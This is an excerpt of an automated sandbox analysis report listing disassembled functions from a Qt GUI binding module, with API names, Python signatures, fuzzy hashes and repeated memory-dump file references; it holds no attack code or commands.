                                                                                                                                                                                                                                          • Snapshot File: hcaresult_5_2_7ff89d930000_check.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID: ?transform@Painter@@Transform@@malloc
                                                                                                                                                                                                                                          • String ID: QPainter$transform$transform(self) -> QTransform
                                                                                                                                                                                                                                          • API String ID: 1370134044-2175011912
                                                                                                                                                                                                                                          • Opcode ID: 5c4a5376b03b21d7c30a09f3d78ca9579a0516dca88fd0563647297cd22fb53f
                                                                                                                                                                                                                                          • Instruction ID: 08fa06b2caf68ebbf0806a3deef1c4baebf7fad821cf17e86dc0bace38a7d0a2
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 5c4a5376b03b21d7c30a09f3d78ca9579a0516dca88fd0563647297cd22fb53f
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: D121FB27D18F8682E710CF25D8456A937A4FB98F88F459231DE8E13226EF78E194C344
                                                                                                                                                                                                                                          Function 00007FF89D9B5FE0 Relevance: 7.0, APIs: 1, Strings: 3, Instructions: 50COMMON
                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                            • Part of subcall function 00007FF89DA59D18: malloc.API-MS-WIN-CRT-HEAP-L1-1-0(?,?,?,00007FF89D9312CB), ref: 00007FF89DA59D32
                                                                                                                                                                                                                                          • ?deviceTransform@QPainter@@QEBAAEBVQTransform@@XZ.QT5GUI ref: 00007FF89D9B603D
                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000005.00000002.2742060685.00007FF89D931000.00000020.00000001.01000000.00000025.sdmp, Offset: 00007FF89D930000, based on PE: true
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742030889.00007FF89D930000.00000002.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742215970.00007FF89DA5B000.00000002.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742369525.00007FF89DB18000.00000008.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742408105.00007FF89DB1A000.00000004.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742472955.00007FF89DB1E000.00000008.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742507094.00007FF89DB26000.00000004.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742542378.00007FF89DB32000.00000008.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742588047.00007FF89DB38000.00000004.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742620970.00007FF89DB3A000.00000008.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742676190.00007FF89DB45000.00000004.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742709268.00007FF89DB51000.00000008.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742742292.00007FF89DB57000.00000004.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742786406.00007FF89DB58000.00000008.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742830626.00007FF89DB6C000.00000004.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742865069.00007FF89DB6D000.00000008.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742896875.00007FF89DB6E000.00000004.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742928215.00007FF89DB70000.00000002.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_5_2_7ff89d930000_check.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID: ?devicePainter@@Transform@Transform@@malloc
                                                                                                                                                                                                                                          • String ID: QPainter$deviceTransform$deviceTransform(self) -> QTransform
                                                                                                                                                                                                                                          • API String ID: 890717423-3406826843
                                                                                                                                                                                                                                          • Opcode ID: a9565c0b6cccddcf90ea89c2875636ae50c3d88ee437b637d27d99c94913b851
                                                                                                                                                                                                                                          • Instruction ID: bfe987827e94c2478ba91654c55b4b414d63ed789850fc7cea24fb7e2ecb8cee
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: a9565c0b6cccddcf90ea89c2875636ae50c3d88ee437b637d27d99c94913b851
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 3521FB27E18F8682E710CF25D8456A937A4FB99B84F459232DE8E17226EF78F194C344
                                                                                                                                                                                                                                          Function 00007FF89D9BFD90 Relevance: 7.0, APIs: 1, Strings: 3, Instructions: 41COMMON
                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                            • Part of subcall function 00007FF89DA59D18: malloc.API-MS-WIN-CRT-HEAP-L1-1-0(?,?,?,00007FF89D9312CB), ref: 00007FF89DA59D32
                                                                                                                                                                                                                                          • ?rect@QPageSize@@QEBA?AVQRectF@@W4Unit@1@@Z.QT5GUI ref: 00007FF89D9BFE00
                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000005.00000002.2742060685.00007FF89D931000.00000020.00000001.01000000.00000025.sdmp, Offset: 00007FF89D930000, based on PE: true
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742030889.00007FF89D930000.00000002.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742215970.00007FF89DA5B000.00000002.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742369525.00007FF89DB18000.00000008.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742408105.00007FF89DB1A000.00000004.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742472955.00007FF89DB1E000.00000008.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742507094.00007FF89DB26000.00000004.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742542378.00007FF89DB32000.00000008.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742588047.00007FF89DB38000.00000004.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742620970.00007FF89DB3A000.00000008.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742676190.00007FF89DB45000.00000004.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742709268.00007FF89DB51000.00000008.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742742292.00007FF89DB57000.00000004.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742786406.00007FF89DB58000.00000008.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742830626.00007FF89DB6C000.00000004.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742865069.00007FF89DB6D000.00000008.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742896875.00007FF89DB6E000.00000004.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742928215.00007FF89DB70000.00000002.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_5_2_7ff89d930000_check.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID: ?rect@PageRectSize@@Unit@1@@malloc
                                                                                                                                                                                                                                          • String ID: QPageSize$rect$rect(self, units: QPageSize.Unit) -> QRectF
                                                                                                                                                                                                                                          • API String ID: 1657382084-3066035369
                                                                                                                                                                                                                                          • Opcode ID: a12d05f3afcd6f10cb9ba8b48ed37eece711a6252fd571d54d754faaf629417b
                                                                                                                                                                                                                                          • Instruction ID: 903814147337e989440cb97acce8b6dceda55a81d08c94f2fdde208e675384e5
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: a12d05f3afcd6f10cb9ba8b48ed37eece711a6252fd571d54d754faaf629417b
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 23110737A18B46C6EB209F11E8896A933A5FB48FC4F914032CA9E47320EF3DE559C704
                                                                                                                                                                                                                                          Function 00007FF89D997D70 Relevance: 7.0, APIs: 1, Strings: 3, Instructions: 40COMMON
                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                            • Part of subcall function 00007FF89DA59D18: malloc.API-MS-WIN-CRT-HEAP-L1-1-0(?,?,?,00007FF89D9312CB), ref: 00007FF89DA59D32
                                                                                                                                                                                                                                          • ?property@QTextFormat@@QEBA?AVQVariant@@H@Z.QT5GUI ref: 00007FF89D997DD6
                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000005.00000002.2742060685.00007FF89D931000.00000020.00000001.01000000.00000025.sdmp, Offset: 00007FF89D930000, based on PE: true
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742030889.00007FF89D930000.00000002.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742215970.00007FF89DA5B000.00000002.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742369525.00007FF89DB18000.00000008.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742408105.00007FF89DB1A000.00000004.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742472955.00007FF89DB1E000.00000008.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742507094.00007FF89DB26000.00000004.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742542378.00007FF89DB32000.00000008.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742588047.00007FF89DB38000.00000004.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742620970.00007FF89DB3A000.00000008.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742676190.00007FF89DB45000.00000004.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742709268.00007FF89DB51000.00000008.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742742292.00007FF89DB57000.00000004.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742786406.00007FF89DB58000.00000008.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742830626.00007FF89DB6C000.00000004.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742865069.00007FF89DB6D000.00000008.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742896875.00007FF89DB6E000.00000004.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742928215.00007FF89DB70000.00000002.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_5_2_7ff89d930000_check.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID: ?property@Format@@TextVariant@@malloc
                                                                                                                                                                                                                                          • String ID: QTextCharFormat$fontFamilies$fontFamilies(self) -> Any
                                                                                                                                                                                                                                          • API String ID: 3525565995-3369884772
                                                                                                                                                                                                                                          • Opcode ID: 95f19b7097581816a65226e7bc2a5f0f0ae451d5a6b1e725866857803429f6ea
                                                                                                                                                                                                                                          • Instruction ID: e48e982433b2367f6eb869959386e5a9e1b36ddcce62a0fc16b4683a8a5c2060
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 95f19b7097581816a65226e7bc2a5f0f0ae451d5a6b1e725866857803429f6ea
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 05113A37A08A4681EB10DF51E8496A933A4FB84FD4F814032DE8E07320EF7DE555C744
                                                                                                                                                                                                                                          Function 00007FF89D965D40 Relevance: 7.0, APIs: 1, Strings: 3, Instructions: 40COMMON
                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                            • Part of subcall function 00007FF89DA59D18: malloc.API-MS-WIN-CRT-HEAP-L1-1-0(?,?,?,00007FF89D9312CB), ref: 00007FF89DA59D32
                                                                                                                                                                                                                                          • ?brushProperty@QTextFormat@@QEBA?AVQBrush@@H@Z.QT5GUI ref: 00007FF89D965DA6
                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000005.00000002.2742060685.00007FF89D931000.00000020.00000001.01000000.00000025.sdmp, Offset: 00007FF89D930000, based on PE: true
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742030889.00007FF89D930000.00000002.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742215970.00007FF89DA5B000.00000002.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742369525.00007FF89DB18000.00000008.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742408105.00007FF89DB1A000.00000004.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742472955.00007FF89DB1E000.00000008.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742507094.00007FF89DB26000.00000004.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742542378.00007FF89DB32000.00000008.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742588047.00007FF89DB38000.00000004.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742620970.00007FF89DB3A000.00000008.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742676190.00007FF89DB45000.00000004.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742709268.00007FF89DB51000.00000008.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742742292.00007FF89DB57000.00000004.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742786406.00007FF89DB58000.00000008.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742830626.00007FF89DB6C000.00000004.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742865069.00007FF89DB6D000.00000008.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742896875.00007FF89DB6E000.00000004.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742928215.00007FF89DB70000.00000002.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_5_2_7ff89d930000_check.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID: ?brushBrush@@Format@@Property@Textmalloc
                                                                                                                                                                                                                                          • String ID: QTextTableCellFormat$rightBorderBrush$rightBorderBrush(self) -> QBrush
                                                                                                                                                                                                                                          • API String ID: 2621215938-1058665623
                                                                                                                                                                                                                                          • Opcode ID: 6ff83208159848bf7cf03c709aec2ea19b9a0dbe62eb37307e0ce6d180c27aec
                                                                                                                                                                                                                                          • Instruction ID: 634dc65bcad37e954106c578d4f379f76bcaaedefcd471bc24bd70c7dd7c9cbd
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 6ff83208159848bf7cf03c709aec2ea19b9a0dbe62eb37307e0ce6d180c27aec
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: B4113A77A18B8681EB109F11E8496A933A4FB48FD0F914032DA8E07720EF7CE559C744
                                                                                                                                                                                                                                          Function 00007FF89D96FFB0 Relevance: 7.0, APIs: 1, Strings: 3, Instructions: 40COMMON
                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                            • Part of subcall function 00007FF89DA59D18: malloc.API-MS-WIN-CRT-HEAP-L1-1-0(?,?,?,00007FF89D9312CB), ref: 00007FF89DA59D32
                                                                                                                                                                                                                                          • ?lengthProperty@QTextFormat@@QEBA?AVQTextLength@@H@Z.QT5GUI ref: 00007FF89D970016
                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000005.00000002.2742060685.00007FF89D931000.00000020.00000001.01000000.00000025.sdmp, Offset: 00007FF89D930000, based on PE: true
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742030889.00007FF89D930000.00000002.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742215970.00007FF89DA5B000.00000002.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742369525.00007FF89DB18000.00000008.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742408105.00007FF89DB1A000.00000004.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742472955.00007FF89DB1E000.00000008.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742507094.00007FF89DB26000.00000004.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742542378.00007FF89DB32000.00000008.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742588047.00007FF89DB38000.00000004.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742620970.00007FF89DB3A000.00000008.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742676190.00007FF89DB45000.00000004.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742709268.00007FF89DB51000.00000008.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742742292.00007FF89DB57000.00000004.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742786406.00007FF89DB58000.00000008.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742830626.00007FF89DB6C000.00000004.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742865069.00007FF89DB6D000.00000008.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742896875.00007FF89DB6E000.00000004.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742928215.00007FF89DB70000.00000002.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_5_2_7ff89d930000_check.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID: Text$?lengthFormat@@Length@@Property@malloc
                                                                                                                                                                                                                                          • String ID: QTextFrameFormat$height$height(self) -> QTextLength
                                                                                                                                                                                                                                          • API String ID: 104013036-3396500128
                                                                                                                                                                                                                                          • Opcode ID: 47afd2b8877be0bd4079d4800e986640a8a1b38b8990d5d2fa147a83c06d4e55
                                                                                                                                                                                                                                          • Instruction ID: bfff335a83d1e5f6c4cf632782ec5bc780f79502e76047abf646fa7dd6114aef
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 47afd2b8877be0bd4079d4800e986640a8a1b38b8990d5d2fa147a83c06d4e55
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: B8113A77A08A86C1EB109F12E8496A933A4FB44FD0F958032DE8E47320EF7DE559C744
                                                                                                                                                                                                                                          Function 00007FF89D953A80 Relevance: 7.0, APIs: 1, Strings: 3, Instructions: 39COMMON
                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                            • Part of subcall function 00007FF89DA59D18: malloc.API-MS-WIN-CRT-HEAP-L1-1-0(?,?,?,00007FF89D9312CB), ref: 00007FF89DA59D32
                                                                                                                                                                                                                                          • ?findBlockByLineNumber@QTextDocument@@QEBA?AVQTextBlock@@H@Z.QT5GUI ref: 00007FF89D953AE5
                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000005.00000002.2742060685.00007FF89D931000.00000020.00000001.01000000.00000025.sdmp, Offset: 00007FF89D930000, based on PE: true
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742030889.00007FF89D930000.00000002.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742215970.00007FF89DA5B000.00000002.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742369525.00007FF89DB18000.00000008.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742408105.00007FF89DB1A000.00000004.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742472955.00007FF89DB1E000.00000008.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742507094.00007FF89DB26000.00000004.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742542378.00007FF89DB32000.00000008.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742588047.00007FF89DB38000.00000004.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742620970.00007FF89DB3A000.00000008.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742676190.00007FF89DB45000.00000004.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742709268.00007FF89DB51000.00000008.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742742292.00007FF89DB57000.00000004.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742786406.00007FF89DB58000.00000008.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742830626.00007FF89DB6C000.00000004.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742865069.00007FF89DB6D000.00000008.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742896875.00007FF89DB6E000.00000004.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742928215.00007FF89DB70000.00000002.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_5_2_7ff89d930000_check.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID: Text$?findBlockBlock@@Document@@LineNumber@malloc
                                                                                                                                                                                                                                          • String ID: QTextDocument$findBlockByLineNumber$findBlockByLineNumber(self, blockNumber: int) -> QTextBlock
                                                                                                                                                                                                                                          • API String ID: 3998515463-2528056247
                                                                                                                                                                                                                                          • Opcode ID: 80071e95e830b6717f19d1c10cb42f43c6302023f11894d76b4295103412fc60
                                                                                                                                                                                                                                          • Instruction ID: 2f5435add89bb26e91a07efd0633cbce748b4073c194de60655fd9c94823f7d8
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 80071e95e830b6717f19d1c10cb42f43c6302023f11894d76b4295103412fc60
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 6C11FB77A19A46C5EB10DF21E8496A933A5FB44FC0F914036DA8E47320EF3DE959C744
                                                                                                                                                                                                                                          Function 00007FF89D9A3E90 Relevance: 7.0, APIs: 1, Strings: 3, Instructions: 39COMMON
                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                            • Part of subcall function 00007FF89DA59D18: malloc.API-MS-WIN-CRT-HEAP-L1-1-0(?,?,?,00007FF89D9312CB), ref: 00007FF89DA59D32
                                                                                                                                                                                                                                          • ?brushProperty@QTextFormat@@QEBA?AVQBrush@@H@Z.QT5GUI ref: 00007FF89D9A3EF5
                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000005.00000002.2742060685.00007FF89D931000.00000020.00000001.01000000.00000025.sdmp, Offset: 00007FF89D930000, based on PE: true
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742030889.00007FF89D930000.00000002.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742215970.00007FF89DA5B000.00000002.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742369525.00007FF89DB18000.00000008.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742408105.00007FF89DB1A000.00000004.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742472955.00007FF89DB1E000.00000008.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742507094.00007FF89DB26000.00000004.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742542378.00007FF89DB32000.00000008.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742588047.00007FF89DB38000.00000004.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742620970.00007FF89DB3A000.00000008.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742676190.00007FF89DB45000.00000004.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742709268.00007FF89DB51000.00000008.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742742292.00007FF89DB57000.00000004.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742786406.00007FF89DB58000.00000008.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742830626.00007FF89DB6C000.00000004.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742865069.00007FF89DB6D000.00000008.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742896875.00007FF89DB6E000.00000004.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742928215.00007FF89DB70000.00000002.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_5_2_7ff89d930000_check.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID: ?brushBrush@@Format@@Property@Textmalloc
                                                                                                                                                                                                                                          • String ID: QTextFormat$brushProperty$brushProperty(self, propertyId: int) -> QBrush
                                                                                                                                                                                                                                          • API String ID: 2621215938-1584719044
                                                                                                                                                                                                                                          • Opcode ID: 0749edb9377bd6908af917fce7d81664574831aaae775d81e906991e8190bd69
                                                                                                                                                                                                                                          • Instruction ID: 5756f484454cc2fcc88a10c45be5e8a4b0dbbd74df329bc592131216e808e74e
